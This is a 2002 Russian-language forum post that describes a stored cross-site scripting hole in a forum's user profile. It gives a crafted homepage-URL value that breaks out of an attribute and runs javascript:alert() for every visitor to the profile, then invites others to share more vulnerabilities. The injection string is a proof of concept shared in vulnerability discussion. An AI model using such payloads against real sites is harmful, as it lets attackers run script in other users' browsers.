Показать сообщение отдельно

  #16  
Старый 05.06.2002, 11:00
mifan
Познающий
Регистрация: 27.05.2002
Сообщений: 80
Провел на форуме:
0

Репутация: 28
Отправить сообщение для mifan с помощью ICQ
По умолчанию

и так подведем итоги:

Если в информации пользователя вместо урл странички указать
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> " style=`background-image:url('javascript:alert()');visibility:hidden" [/QUOTE]<span id='postcolor'>
То этот скрипт сработает у всякого кто просмотрит вашу инфу.
=======================================
Так что еще, может кто нибуть нашел еще уязвимости?